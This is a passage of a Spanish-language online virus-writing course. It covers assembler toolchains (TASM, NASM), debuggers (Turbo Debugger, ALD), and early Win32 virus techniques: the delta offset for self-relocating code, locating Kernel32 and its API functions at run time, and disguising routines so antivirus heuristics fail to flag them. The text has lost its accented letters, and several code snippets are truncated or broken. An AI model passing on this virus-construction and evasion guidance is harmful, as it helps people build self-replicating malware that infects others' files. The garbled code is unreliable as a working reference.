TASM32.EXE y TLINK32.EXE TASM32.EXE El primer paso al compilar nuestro listado va a ser ejecutar esta utilidad, que va a realizar el compilado del fichero. La forma de utilizacin bsica es "Tasm32 ", aunque vamos a necesitar indicarle algunos parmetros, como por ejemplo: -m#: Aqu el # es un nmero que indica cuantos "repasos" para resolver llamadas y referencias se van a dar. Es importante delimitarlo, puesto que si pegamos una o dos pasadas (m1, m2), muchas veces nos van a dar fallos que no deberan. Personalmente suelo ponerlo a 5 pasadas.
-ml/mu: Sensibilidad para maysculas/minsculas. Si ponemos "-ml", el ensamblador interpretar por ejemplo que "Etiqueta" es diferente a "etiqueta". la opcin "-mu" indicara que no se hace caso de este hecho -q: Supresin de partes no necesarias para el linkado (la segunda fase, que explicaremos ms adelante). -zn/zd/zi: Informacin para debugging. Para ciertos programas de debuggeo, es interesante activar esta opcin. Zn indica que no se guarda ninguna informacin, zd que se guardan los nmeros de lnea, y zi guarda toda la informacin. -i: Indica el path para los ficheros que incluyamos con la directiva "include" en el propio cdigo. Esto slo son algunos ejemplos de parmetros que se indican al compilador; por suerte si escribimos simplemente "tasm32", se nos mostrar la lista de parmetros con una pequea explicacin de lo que hace cada uno. Personalmente, suelo utilizar para compilar una lnea tipo "tasm32 -ml -m5 -q -zn nombrevirus.asm" Por supuesto, si algo est mal escrito en nuestro cdigo, el compilador nos indicar amablemente en qu nmero de lnea hemos metido la zarpa y a ser posible el tipo de fallo que ha habido. TLINK32.EXE Tras el proceso de ensamblado, toca la segunda parte, el linkado (traducido literalmente, "enlazado"). Un poco dicho a lo bestia, es como si al usar el compilador hubiera convertido lo que hemos escrito en un cdigo ensamblador algo disperso, y con el linkador vamos a estructurarlo para que sea un ejecutable bueno y decente ;-). De nuevo, tenemos unas cuantas opciones, de las que detallo alguna: -Txx: Indica el tipo de fichero que queremos generar. Si queremos hacer un ejecutable de Windows, pondremos -Tpe (PE es el formato de fichero en Windows95, 98 y NT). -Tpd indicara que queremos hacer un .DLL -v: Indica que queremos informacin para debugging. -c: De nuevo el tema de mayusculas/minusculas (las tiene en cuenta). -aa: Con esta opcin indicamos que usamos la API de Windows, por defecto est bien ponerla y tal. De nuevo, tenemos suerte y ejecutando Tlink32 sin parmetros nos va a explicar los que podemos utilizar. Un ejemplo tpico de uso sera algo como "tlink32 -v -Tpe -c -x -aa nombrevirus,,, import32". Hay un par de cosas a destacar en esta lnea, aunque tampoco quiero profundizar (es de esas
cosas que se pueden utilizar sin entender, al fin y al cabo xD). En primer lugar, que no escribimos el ".asm" al final del nombre del fichero origen, en segundo lugar que tenemos tres comas y algo llamado "import32" por ah que de momento no sabemos lo que es. El tema del import32, consiste en que hay un fichero bastante standard y bastante distribudo (creo yo que viene con la distribucin del TASM, pero sino se puede encontrar fcilmente) llamado import32.lib, que por as decirlo nos facilita poder acceder a la API de Windows. Es decir, si yo quiero ejecutar alguna llamada a la API de Windoze, tengo que importar esa librera donde se hace referencia a estas APIs. En cualquier caso, si no la encontrais podis fabricaros una utilizando el IMPLIB.EXE sobre las libreras que tenis en windows\system. Particularidades de TASM A continuacin, copio un pequeo listado improvisado donde paso a comentar lo que sucede, que me parece mejor que simplemente ir listando cosas. Puede que me deje alguna, pero en cualquier caso en la propia pgina tenis un virus de windows que sirve de ejemplo bastante bien: ; ; Programa de prueba ; ;.486p ; modelo de procesador (486 modo protegido, conviene dejarlo as como standard) .model flat ; lo mismo digo (esto hace referencia al modelo de memoria, flat) NULL EQU 00000000h MB_ICONEXCLAMATION EQU 00000030h ; Esto hace que cuando escribamos p.ej "NULL", el ensamblador ;lo vaya a interpretar como un 0. EQU es "equivale a", y es util ;usarlo para no tener que recordar valores absurdos (el ;MB_ICONEXCLAMATION es el valor que indica que una ventana pop-up ;muestre una exclamacin) extrn ExitProcess: proc extrn MessageBoxA: proc extrn GetProcAddress: proc ; Esto son las APIs que estamos importando para utilizar en nuestro ;cdigo. Para ello tenemos que escribir el nombre de la API antes de ;los : y el proc (sencillo, no?) .data ; Seccin de datos del ejecutable. La haremos de tamao 1 byte (y por qu no? xD) db ? .code ; Ahora viene la parte seria, la seccin de cdigo de nuestro programa Start: ; Esta primera etiqueta es algo que hay que recordar, porque luego ;la vamos a cerrar al final. push MB_ICONEXCLAMATION push offset Titulo push offset Escribir
push NULL call MessageBoxA ; Recordis la forma de llamar a la API de Windows? Estamos empujando ;a la pila el valor de una ventana con exclamacin, el offset ;"Titulo" (titulo de la ventana, con un 0 al final), el offset de ;"Escribir" (texto de la ventana), y un valor NULL, llamando luego a ;la API "MessageBoxA", que saca una caja de estas con botn slo de ;aceptar (indicado si no recuerdo mal por el NULL), para que le demos. call ExitProcess Titulo: db 'Titulo de la ventana',0 Escribir: db 'Esto es el contenido de la ventana',0 include algo.incinclude algo2.asm; Los includes son algo bastante til cuando tenemos un buen pedazo ;de programa. En cierto modo es como cuando hacemos un include en C, ;slo que no necesitamos ficheros de definicin ni nada as. Por ;decirlo claro, con un include estamos diciendo "aqu, tu acta como ;si todo fuera un gran fichero donde justo en esta parte est lo que ;haya en el fichero includo (vamos, que el fichero algo2.asm puede ;ser sencillamente una linea de texto que ponga "push ax", y lo que ;har es sustituirlo). end Start ;Esto es el final del cdigo, y se indica con "end" seguido de ;la etiqueta que pusimos al principio del cdigo. Supongo que me dejar unas cuantas cosas, pero al menos con esto tenis una idea del aspecto que ha de tener un fichero en ensamblador de cara a ser compilado con TASM, y las pequeas chorraditas que hay que meter para que funcione. Personalmente, suelo utilizar un fichero .BAT para que me haga la compilacin; un detalle, si tenis datos metidos en la seccin de cdigo, al compilar el programa la seccin de cdigo no va a ser escribible (normalmente no se modifican las secciones de cdigo). Para ello os recomiendo que os hagis con una utilidad llamada pewrsec de Jacky Qwerty (facilita de encontrar). A lo que iba, este es un ejemplo de un fichero BAT para compilar un programa: tasm32 -ml -m5 -q -zn viruz.asm tlink32 -v -Tpe -c -x -aa viruz,,, import32 pewrsec viruz.exe No viene nada mal no tener que estar escribiendo lneas enteras de memoria y tal, ya sabis xD. Haceos algo como esto y olvidaos lo antes posible de tener que cambiar algo de cara al TASM, as os podis centrar en programar que es al fin y al cabo lo que todos queremos hacer, no?. Y de dnde me lo bajo? Esta pregunta es sencilla de resolver; vete a http://www.oninet.es/usuarios/darknode y en "other interesting virus related stuff" busca el enlace al TASM.
12 - Ensamblador VIII
Curso gratis creado por Wintermute . 22 Febrero 2006 Doctorado a Distancia Obtenga su Doctorado a distancia Estudios universitarios a distancia www.aiu.edu Anuncios Google
< anterior | 1 .. 10 11 12 13 14 .. 18 | siguiente >
""
NASM (Linux)
Por suerte, en aspecto vais a ver que no hay una gran diferencia entre el NASM y el TASM. Otro gallo cantara si usseis el GNU Assembler (ms conocido como GAS), pero no hace falta repetiros la grima que me da el formato At&t de los... en fin :). En esta ocasin, al igual que antes utilizbamos el TASM y el TLINK, vamos a tener que tirar de dos ejecutables; el primero va a ser el propio ejecutable llamado nasm, el segundo es un viejo conocido, el gcc.
Cuando utilicemos el NASM para compilar, realmente slo van a haber dos opciones que nos resulten interesantes - aunque como siempre hay alguna ms:
-o: Indica el fichero de "output", o sea, donde va a poner el resultado. Si nuestro fichero original se llama virus.asm, podra ser una buena opcin escribir un "-o virus.vir" como parmetro.
-f: Indica el formato de fichero que pretendemos lograr. Lo ms normal es que queramos un ejecutable tipo ELF, con lo cual nada como escribir "-f elf".
As pues, la lnea standard que usaremos con el NASM para compilar ser algo como "NASM fichero.asm -o fichero.tmp -f elf".
La siguiente fase requiere tirar del GCC para acabar de compilar el fichero. La verdad es que ni me acuerdo de cual coo era el significado de las opciones (adems estoy usando el Dreamweaver en Windoze as que comprenderis que no voy a arrancar el Linux slo para mirar las pueteras
opciones xD, RTFM sucker xDD). Importante, pues que -s significa origen (sorce) y -o destino; mi lnea standard con el GCC es "gcc -Wall -g -s fichero.tmp -o fichero.exec". Una vez ejecutado esto, tendremos en fichero.exec el Elf ejecutable que estbamos buscando (facilito, no?).
Un detalle, tal y como en Windous conviene usar un BAT y tal sobre todo si vamos a compilar muchas veces, pues haceros un script tonto que meta estas dos lneas para que escribiendo "sh loquesea" podis compilar sin tener que escribir toda la burrada de atrs. Por cierto, que aqu tenemos el mismo problema que en Windows, es decir, no podemos escribir en la seccin de cdigo por defecto. Creo que est colgada de la web una utilidad que escrib llamada "dwarf" que lo que hace es coger al fichero elf y cambiar esos parmetros. As, mi "fichero standard de compilacin" es algo como esto (hago copy&paste de la que uso para mi virus Lotek):
nasm lotek.asm -o lotek.vir -f elf gcc -Wall -g -s lotek.vir -o lotek.exec dwarf lotek.exec
Particularidades en NASM
De nuevo, como creo que lo mejor es poneros un listado compilable, pues vamos con ello y cuento alguna cosita:
BITS 32
main: ov eax,dword[ebx+09Ch] ; Esta linea de codigo es una estupidez pero sirve para mostrar una gran ;diferencia (de las pocas) entre TASM/NASM. En el TASM para indicar que ;queremos leer 4 bytes diramos mov eax, dword ptr [ebx+09ch], pero aqu ;lo del ptr sobra.
mov eax,1
int 080h ; La interrupcin 80h en Linux es recordemos la que vamos a utilizar casi ;exclusivamente al programar. Ojo aqu una diferencia con TASM, que son ;las formas de representar en hexadecimal: o le metemos un cero delante y una ;h al final, o hacemos como en este db que viene ahora: valores:
db 0x0A,0x04; Bien, en este db, retomando lo dicho, usamos el mtodo alternativo, ;escribir 0x0numero para indicar que es hexadecimal. ; Encima no tenis ni que meter el END que haba en el TASM, ms facil chungo nop?. Bueno vale, seguro que me ;he olvidado de algo, pero no soy una mquina y esto se aprende de una sla forma: cogis la base que intento dar ;(suponiendo
que os est sirviendo de algo claro xD), cogis listados en ASM para aprender a leerlos, y programis ;a sako...
En caso del NASM, estamos hablando de una utilidad gratuta. Aparte del lugar desde donde se puede llegar, muy recomendable por otros muchos aspectos que es http://linuxassembly.org, el programa puede bajarse dirctamente de http://nasm.2y.net.
Introduccin
La primera pregunta que he de responder aqu se simple: qu es un debugger?. Pues bien, un debugger es un programa con el que podemos ir ejecutando paso a paso las instrucciones de nuestro programa, de cara a depurarlas (darnos cuenta de qu es lo que falla y corregirlo).
Aunque queda muy chulo mirar el cdigo ensamblador de tu programa y darte cuenta de qu es lo que falla y corregirlo, a veces la cosa se complica y viene bien un poco de ayuda. Con un debugger (en este caso uno sencillo como el TD), podemos ver a cada momento cual es el valor de los registros del procesador y cmo afecta la ejecucin de las instrucciones a estos registros y a distintas posiciones de memoria, obteniendo bastante informacin que nos puede llevar a su solucin.
Arrancarlo es tan sencillo como escribir "TD32 nombrefichero.exe" desde una ventana de Ms-Dos. Si por ejemplo como parmetro ponemos el fichero c:\windows\telnet.exe, tendremos algo como esto:
No s si parecer complicado o no, pero ahora os explico; como veris, he dividido bsicamente la pantalla en "Codigo", "Volcado" y "Registros". Se cambia entre estas partes de la pantalla con la tecla tabulador (si os fijis, la parte de "cdigo" est rodeada por un color azul, eso indica que est seleccionada):
- Cdigo: Aqu estn desensambladas una a una las instrucciones del programa. Dado que hemos ejecutado "td32 telnet.exe", estas son las primeras instrucciones del fichero telnet que tengo en el directorio del Windows. Vemos que hay tres columnas, aparte de unas cuantas filas, tambin.
La primera columna indica la direccin de memoria donde se encuentra la instruccin desensamblada (con ese smbolo de flecha mirando hacia la derecha en la que se va a ejecutar la prxima, en este caso la prxima es "push ebp"). La segunda columna, se trata de la codificacin en hexadecimal de la instruccin desensamblada. Esto quiere decir, que push ebp se codifica como "55h", o que mov ebp,esp se codifica como "08bech".
Bueno espero que a nadie le sorprenda a estas alturas que nuestro bonito push ebp no sea ms que un "055h", y que no tenga que explicar de nuevo como hice en el primer captulo que lo que hace el procesador cuando ejecuta un programa es coger ese 55h, decir "ah, eso corresponde a un push ebp" y realizar la operacin...
- Registros: Como podis ver, est bien clarito; al lado del nombre de cada registro viene su valor. As, en el momento en que captur esa pantalla, EIP vale 010081c0, etc etc. Importante, los registros que vienen a la derecha, todo este tema de z=0, s=1, etc... vengaaaaa, esa intuicin?. Pues s, efectivamente z=0 indica que el flag de zero en el
registro de flags est a cero, as como o indica overflow, p paridad, c carry o i inhibicin de interrupciones.
-Volcado: Esta parte muestra el contenido en hexadecimal (byte a byte) a partir de una direccin de memoria. En este caso es a partir de la 0000000, contando 1 por cada byte (dos cifras hexadecimales). A la derecha vemos unos cuantos smbolos raros; se trata de la representacin en ASCII de los nmeros que hay en la parte central. La ventana de volcado es bastante til porque es independiente de la de cdigo, y porque de paso si queremos ver un texto en la columna en la que est traducido a ASCII nos lo va a mostrar, en lugar de desensamblarlo como si fuera cdigo.
Vale, hemos visto al Turbo Debugger en plan esttico, pero evidentemente eso no es lo que queremos; si lo nico que queremos es un listado en ensamblador de un fichero, utilizaramos los desensambladores, que para algo estn xD. Lo que queremos aqu es ejecutar paso a paso, y podemos hacerlo de las siguientes formas:
- Dar un paso: Esta rden se la podemos dar a Turbo Debugger de dos maneras, pulsando las teclas F7 o F8. La diferencia es, digamos, que con el F8 (step) vamos un poco ms a lo bestia que con F7 (trace). Con F7 ejecutamos absolutamente cada instruccin paso a paso. Con F8 sin embargo damos "pequeos pasitos". Esto significa que por ejemplo, si encontramos una instruccin CALL, con F7 la siguiente instruccin que ejecutaremos ser a la que llama el CALL, sin embargo con F8 ejecutaremos *todo* lo que hay dentro del CALL, pasando a la siguiente lnea.
En este caso, sin embargo, al dar un paso nos vamos a encontrar con la siguiente situacin lo hagamos con F7 o F8: Veamos, qu ha sucedido? Pues que el "push ebp" se ha ejecutado. La flecha que est en la barra azul y la propia barra azul se han desplazado un espacio hacia abajo, sealando a la prxima instruccin que toca ejecutar. Adems, vemos que en la parte dedicada a los registros, hay tres de ellos sealados en blanco. Por qu es as? Bien, es una forma cmoda mediante la que Turbo Debugger nos indica que el valor de estos registros ha cambiado despus de ejecutar la ltima instruccin. ESP ha cambiado dado que hemos empujado un valor a la pila, EIP lo ha hecho porque es el registro que seala la prxima instruccin a ejecutar.
-Ejecutar todo el programa: Para ello tenemos la opcin "run". La opcin "run" se activa con la tecla F9, y ejecuta el programa hasta el final a no ser que hayan... a no ser que haya lo que llamamos "breakpoints", que es una de las cosas ms tiles que nos dan las utilidades de debuggeo.
-Otras opciones: Turbo Debugger tiene un montn de opciones, que no voy a dedicarme a detallar, la mejor forma de aprender a usarlas es usndolas. Sin embargo, si que voy a dedicar una seccin a lo que creo que es el segundo punto importante de comprender no ya de cara a usar el TD32 slo, sino en general para usar cualquier debugger, que son los breakpoints.
Breakpoints
El propio nombre lo dice, Breakpoint significa "punto de ruptura". Imaginad que el fallo en vuestro programa pensis que debe estar algo as como en la lnea 400, donde se producen tal y cual instrucciones. No puedes ejecutar paso a paso hasta all porque es un maldito coazo, ni puedes hacer un "Run" porque lo ejecuta hasta el final y es un tanto estpido. As pues, lo que utilizas son Breakpoints.
Un Breakpoint est ligado a un punto de la ejecucin, y lo que va a hacer es que si le damos a la opcin "Run", el debugger ejecute hasta el punto en el que hemos puesto nuestro Breakpoint y ah se detenga, dejndonos que sigamos haciendo lo que hemos venido a hacer. En Turbo Debugger, la forma ms sencilla de poner un breakpoint es movernos en la ventana de cdigo hasta la instruccin en la que queramos ponerlo y darle a F2:
Como vemos, el lugar donde hemos puesto el breakpoint (bueno, entretanto he movido con las flechas la barrita azul para ponerla donde ahora est la roja y la he vuelto a poner en la instruccin que toca ejecutar), es donde se encuentra la barra roja. De esta forma tan grfica, vemos que hay un Breakpoint ah. Ahora, si le damos sencillamente a F3 (ejecutar programa), este se ejecutar hasta llegar al breakpoint, momento en que se parar y podremos volver a meter mano por donde queramos.
De donde bajarlo
Turbo Debugger, aunque se puede encontrar como programa aparte, viene con el TASM normalmente, con lo que si tenis uno tenis el otro y fuera problemas ;-).
ALD (Linux)
Introduccin
Bueno, dado el hecho de que antes ya he explicado un poco como funciona un debugger y esas cosas, esta seccin va a ser deliberadamente bastante corta; bsicamente, voy a explicar cmo hacer lo mismo que antes con un debugger bastante sencillito para Linux y que para hacer cuatro cosas no est nada mal. Adems tiene una ventaja y es que se parece bastante al Debug de MsDos, con lo que los que lo hayan usado tardarn pocos minutos en sacarle buen partido. Vamos pues con ALD, o Assembly Language Debugger:
Bases de funcionamiento
ALD es una aplicacin que funciona en modo texto, por lo que no vamos a tener ni ventanitas con mens ni dems pijaditas que venan por ejemplo con el Turbo Debugger. Esto, no implica que vaya a ser complejo en su funcionamiento. Al contrario, es muy rpido aprender las cuatro cosas que aprendimos con TD y seguir averiguando por nuestra cuenta el resto de opciones que posee.
El ALD puede arrancarse despus de instalarlo (sencillito, configure/make/make install y no suele dar problemas) simplemente tecleando su nombre o indicando como parmetro un fichero. Al ejecutarlo nos dir la versin y tal, y si metimos un nombre de fichero como parmetro (ald /bin/ls p.ej), nos confirmar que se trata de un fichero de formato ELF (ejecutable) y tal.
Veremos que estamos en una lnea de comandos, el programa nos pide que introduzcamos palabras para decirle qu hacer a continuacin. Listo algunas interesantes:
-help:Una de las ms importantes :-). Nos sacar un listado con todos los comandos que podemos utilizar, e igualmente podremos escribir "help comando" para obtener ms detalles de una en particular.
-d (desensamblar): Puesto sin parmetros va a desensamblar unas cuantas lneas a partir de la lnea de cdigo que toca ejecutar ahora. Con parmetro podremos hacerlo sobre una direccin de memoria que deseemos.
-e (examine): Esto mostrara un trozo en hexadecimal/ASCII tal y como haca la ventana inferior del Turbo Debugger, sobre la zona que indiquemos como parmetro.
- reg (register): Muestra el contenido de los registros (como la ventana derecha del Turbo Debugger)
-s (step) y n (next): Se trata de los dos equivalentes a step y trace que vimos en Turbo Debugger. Ejecutaremos con ellos paso a paso las instrucciones del fichero desensamblado, y a cada paso (cada vez que introduzcamos el comando), se nos mostrar la prxima instruccin a ejecutar y el contenido de los registros.
-load : Si hemos cargado el ALD sin poner como parmetro un fichero, con la rden load podemos cargarlo ahora (o elegir otro).
-break/tbreak: Pone en la direccin que indiquemos un breakpoint (no volver a explicar qu son). La diferencia entre ambos comandos es que break pone un breakpoint permanente (aunque luego podemos quitarlo), y tbreak un breakpoint temporal, que slo
funcionar una vez. Adems, podremos usar algunos comandos ms para gestionar los breakpoints (por ejemplo, lbreak lista los breakpoints actuales).
En fin, ya dije que esta seccin dedicada al ALD iba a ser deliberadamente breve; no es pereza, sencillamente los conceptos bsicos como qu es un breakpoint o para qu sirve un debugger ya los expliqu en la seccin anterior. Turbo Debugger y ALD sirven para lo mismo y tienen la misma base de funcionamiento, sencillamente el entorno en que funcionan es diferente y es este el que he intentado introducir un poco.
Donde conseguirlo
La ltima versin del ALD se encuentra en http://ellipse.mcs.drexel.edu/ald.html (slo para plataformas Intel x86)
Otras utilidades
Hay unas cuantas utilidades ms perfectas para el escritor de virus y que han sin duda de formar parte de su kit de supervivencia, aunque se vayan incorporando poco a poco con el tiempo. De nuevo os recuerdo que aunque haya elegido el ALD como debugger para Linux y el TD32 como debugger para Windows, no son los mejores en absoluto (aunque cumplen su funcin), sino simplemente los ms sencillos de manejar. La idea es que en un par de minutos estis manejando cualquiera de los dos, pero si os metis en serio, es recomendable echarle un poco de tiempo y aprender a manejar el GDB para Linux (que viene en toda distribucin), y el Softice para Windows, que podis buscar a travs de la pgina de Darknode en la misma seccin que el TASM.
Un apartado que no voy a desarrollar es el de los desensambladores. Tenemos el IDA disassembler, que viene con un editor de texto integrado para comentar el cdigo desensamblado y unas cuantas pijaditas ms (es muy bueno, en serio).
""
Curso gratis creado por Wintermute . 22 Febrero 2006 Excel avanzado - Arequipa Convirtete en un Experto en MS Excel. Inicio 20 de Junio www.bsgrupo.com Anuncios Google
< anterior | 1 .. 11 12 13 14 15 .. 18 | siguiente >
""
Introduccin
Bueno, aviso que esta entrega va a dar mucha caita... reescribo este apartado de introduccin cuando an no he acabado el apartado 7.1.3, y ya me doy cuenta de que estoy metiendo una cantidad de conceptos bestial en un slo tutorial; pero yo ya lo avis eh ;-). Primero empezamos con una descripcin de lo que es el Delta Offset (necesario para cualquier SO), luego con cmo sacar las funciones de la API de Windows, y de ah al infinito y ms all xD. La parte de infeccin en s, no obstante, tiene el apartado 7.2 para ella solita.
El "Delta Offset"
El Delta Offset no es una tcnica que vayamos a necesitar slo bajo Windows, sino en general con cualquier entorno en el que queramos programar un virus. Surge debido a cierto problema al que es la solucin ms sencilla.
Cuando uno coge tan feliz y compila su programa en ensamblador todo va con suerte perfecto, s, pero... cuando en nuestro cdigo hacemos una referencia a una etiqueta para coger datos, como mov eax,[datos], pues en la primera generacin va bien, por qu? Pues porque "datos" se codifica como por ejemplo 0401444h, con lo que cuando accedemos a [datos] en realidad lo que hay codificado al compilarlo es mov eax,[0401444h]. Esto, se debe a que el programa va a ser cargado en una determinada regin de memoria (una comn es 0400000h), con lo que el compilador que genera el ejecutable presupone que el lugar "datos" siempre va a estar en el mismo sitio.
Eso sera cierto, de no ser porque si infectamos un archivo vamos a estar en un desplazamiento diferente, con lo que si se repite ese "mov eax,[datos]", en la direccin 0401444h puede haber cualquier cosa. Incluso aunque tambin se hubiera iniciado el programa infectado en la direccin 0400000h, nuestro "datos" podra estar en cualquier lado, por ejemplo 0409123h. Ah tenemos el problema, que acceder a datos (porque esto slo sucede con datos que referenciamos con etiquetas pero NO con saltos tipo JMP o condicionales, o CALLs) se nos hace un poquito difcil as,
y si smplemente dejamos el "mov eax,[datos]" pues el virus va a reventar en cuanto infecte su primer archivo.
Ahora bien, como digo existe una solucin bastante sencilla, aunque nos va a dejar ocupado uno de los registros de forma permanente, que es esta tcnica del Delta Offset. La base, es averiguar el desplazamiento relativo al inicio del virus respecto al desplazamiento en el fichero original, y sumarlo siempre que se haga una referencia a datos dentro del propio virus. S, suena muy complicado as que pongamos cdigo:
pop ebp
Tan sencillo como eso. Cuando hacemos un call al offset Delta, lo que estamos haciendo en realidad es guardar en la pila el valor de ese offset; es decir, que si Delta estuviera en 0401003h, el pop ebp dara ese valor el registro ebp. As, en la primera generacin del virus (es decir, recin compilado), su valor ser ebp = 0. Que por cierto, este inicio tpico es una forma perfecta para detectar la mitad de los virus que hay para Windows sin ms herramienta que el Turbo Debugger (si las primeras lneas hacen algo equivalente a esto, malo malo).
Ahora, supongamos que hemos infectado un archivo y que por tanto en l lo primero que se ejecuta son las tres lneas de cdigo introducidas anteriormente. Pues bien el valor de ebp ahora va a ser el de (Delta actual - 0401003h). Esto, indica la diferencia que hay positiva o negativa entre el lugar de una posicin de memoria al principio (cuando Delta era 401003h) y ahora. Es decir, si ahora Delta estuviera en 0401013h, ebp valdr 10h (y esto ser vlido sea cual sea el valor actual de Delta, pues la rden (sub ebp, Offset Delta) ya tiene codificado Delta = 0401003h en el compilado original).
Por tanto, para acceder a cualquier dato referenciado por una etiqueta dentro de nuestro cdigo, en lugar de hacer un mov eax,[valor], haremos un mov eax,[valor+ebp] lo cual corregir ese movimiento de direccin base dejndonos pues que el virus funcione sin problemas se cargue donde se cargue.
Evidentemente, ni es necesario hacerlo en ebp ni exctamente de esta forma; si bien parte de la creatividad de un escritor de virus se encuentra en desarrollar nuevas tcnicas de infeccin o agujeros en sistemas operativos, quiz la ms importante es la de jugar con el cdigo ensamblador a su gusto. En este ejemplo, las lneas de cdigo que he puesto sern detectadas por la mayora de los engines heursticos de antivirus como "posible virus", puesto que los programas normales no hacen eso. Una inmensa parte de la creatividad por tanto al programar un autorreplicante consiste en montarte tus propias maneras de escribir rutinas de formas extraas o poco reconocibles, o smplemente variadas para que no sean reconocidas al instante por un antivirus.
Para acabar este extenso apartado dedicado al Delta Offset, pongamos un ejemplo distinto de cmo hacerlo; eso s, esta vez no explicar cmo funciona, esto lo dejo como ejercicio mental ;-)...
mov esi,esp
lodsd
ret Continuar:
Llamar a la API del sistema, que invariablemente vamos a tener que utilizar, no es tan sencillo en un sistema como Windows como lo es en Linux y Ms-Dos. En estos dos ltimos basta con una llamada a una interrupcin, pero en Windows la cosa se pone difcil. Como recordaris en el captulo V cuando hablamos sobre API en distintos SO (este es un buen momento para mirarlo otra vez), bajo sistemas Win32 la forma de llamar a las funciones de sistema es empujando los parmetros y llamando a una direccin de memoria. Es decir, que normalmente la llamaras con algo como esto:
Inicio:
push MB_ICONEXCLAMATION
push NULL
Es decir, que para hacer la llamada vamos a tener que empujar una serie de valores en la pila (en este caso el icono de la ventana, offset del ttulo y el texto y un valor NULL que indica el tipo de botones que va a tener, en este caso slo uno de "aceptar") y luego hacer un call a "MessageBoxA", es decir, a la funcin de la API encargada de imprimir el texto.
Sin embargo, quiz os habris dado cuenta de que a nosotros este sistema no nos va a servir, por el mismo motivo por el que necesitbamos el Delta Offset. Cmo funciona el tema de las API en Windows? Bien, nosotros programamos algo como esto, y al compilarse en el ejecutable hay una "tabla de importaciones" que indica qu funciones y de qu DLLs se van a utilizar. Efectivamente, las funciones a las que llamemos, que si MessageBoxA, que si ExitProcess, que si CreateFileA, todas se importan de DLLs de Windows; precisamente, es que la utilidad de las DLLs es la de proporcionar estas APIs a programas que lo soliciten.
La mayor parte de las APIs que vamos a utilizar se encuentran en un slo fichero, que encontraris en vuestro directorio C:\Windows\System. Este fichero, se llama Kernel32.DLL y contiene la mayor parte de funciones referentes a funciones I/O como acceso a ficheros, directorios, etc; de hecho, es bastante probable que nos sobre con esta librera de cara a escribir un virus para Windows.
As pues, la librera Kernel32.DLL cuando es importada por un ejecutable suele cargarse en una direccin por defecto. La comn en un Windows95 o 98 es la direccin 0BFF70000h (no se si pongo una F de ms o de menos xD), aunque dependiendo de la versin de Windows esto puede variar. Tambin, la direccin de cada funcin va a variar, segn versiones del propio Windows (ya se sabe, como tienen tantos bugs de vez en cuando sacan revisiones de sus versiones, y si esas nuevas versiones tienen un Kernel32.DLL de distinto tamao la direccin de la funcin ser distinta).
El caso es que NO podemos asegurar que por ejemplo la direccin de MessageBoxA va a estar siempre en el mismo sitio; es bastante probable que si llamramos a MessageBoxA por su direccin fsica, en cuanto el virus est en un ordenador diferente de un error de esos realmente horribles.
Existe una funcin de Kernel32 llamada GetProcAddress que nos va a decir cul es la direccin fsica de la funcin que buscamos. De hecho, a esta funcin se le llama as:
FARPROC GetProcAddress ( HMODULE hModule, // handle to DLL module LPCSTR lpProcName // name of function );
S que cada vez que hablo hago que suene ms complicado O:), pero vamos a joderla un poquito ms. Los parmetros (esto lo acabo de cortar/pegar del fichero Win32.hlp, que os aconsejo que busquis por Internet o en el SDK de Microsoft, puesto que describe la mayora de las funciones importantes) son dos; un puntero (eso que pone lpProcName) a un nombre de una funcin de la que queremos obtener su direccin, y un handler, "hModule", que se refiere a la propia DLL.
Ahora la pregunta es, qu coo es ese handler? Es decir, vale, yo empujo a la pila un puntero a "MessageBoxA", pero, qu uso como handler?. Pues bien, el handler es el resultado de otra API, GetModuleHandle, que vemos a continuacin:
HMODULE GetModuleHandle( LPCTSTR lpModuleName // address of module name to return handle for );
As pues, para poder obtener el handler que hay que utilizar en GetProcAddress, tendremos que llamar a GetModuleHandle pasndole como parmetro un puntero a una cadena de texto en la que ponga "db 'KERNEL32.DLL',0".
Pero algunos se habrn dado cuenta ya de que aqu hay algo que falla y que esto es un poco como lo de qu fue primero, si el huevo o la gallina. Antes he dicho que el motivo para usar GetProcAddress es que las direcciones varan segn subversiones de Windows; sin embargo, GetModuleHandle es una API que tambin pertenece a Kernel32.DLL. Entonces? Qu pasa, que estamos como al principio? Pues en cierto modo s, y en cierto modo no.
Est claro que estamos en un crculo cerrado en el que no hay dios que obtenga la direccin de una API. Pero como el Laberinto siempre te da una oportunidad (Haplo rulez, yo me entiendo xD), efectivamente hay no slo una sino ms de una formas de obtener estas direcciones de funciones de la API. La ms evolucionada y que ahora se utiliza ms es algo compleja, pero al tiempo hermosa ;-), y creo que es la que debo explicar.
Bien, ya me he pasado un apartado entero exponiendo problemas, ahora vamos a hablar de soluciones. Lo primero que podemos saber, es que el Handler que hay que meterle a GetProcAddress para que nos diga direcciones de funciones resulta ser exctamente la direccin base a partir de la cual est cargada en memoria la librera Kernel32.DLL. Dado que en Windows 95 y 98 va a ser con toda probabilidad la misma, esa 0BFF70000h, la solucin ms sencilla y que se ha estado utilizando un buen tiempo, es tan sencilla como hacer:
Pero no, esta no es una gran solucin (seguimos sin tener la direccin de GetProcAddress, verdad?). Bueno, pues entonces la aproximacin como digo "vieja" es buscar dentro del cdigo de Kernel32.DLL (que al fin y al cabo est en 0BFF70000h) la direccin fsica de GetProcAddress. Luego explicar un poco cmo encontrarlo (puesto que la DLL es un ejecutable de Windows
normal, y est en memoria completo), pero de momento la aproximacin de coger 0BFF70000h como standard no es buena puesto que puede variar.
Ahora pensemos un poco "hacia atrs". Cuando nuestro virus se ejecute, esto es resultado de que se est ejecutando un fichero. Y qu funcin de la API de Windows hace que se ejecute un fichero? Pues una que se llama CreateProcess. Coo, si CreateProcess est en Kernel32.DLL, que cosas, verdad?. Pues justo, por ah vamos a hacernos a la idea de dnde est el Kernel32.DLL independientemente de dnde estemos. Pensad que para ejecutar CreateProcess el cdigo de Windows hace algo como esto:
call Kernel32.CreateProcess
Hmmmm s, fijaos que es un call como los que nosotros usamos. Y por unas casualidades de la vida, el ltimo call que llama al programa ejecutable, se est haciendo desde Kernel32.DLL. Un call lo que hace es empujar a la pila el valor del registro EIP actual, verdad?. Y adems, como nuestro virus es lo primero que se ejecuta al arrancar un programa... os imginais donde se encuentra la direccin de retorno de ese ltimo CALL? Voil, precisamente en ss:[esp+8h], casi justo en la pila (los dos primeros valores son puntero a argumentos pasados al programa y nombre del programa),... as de majos que son los del Windows que nos lo dejan a tiro xD.
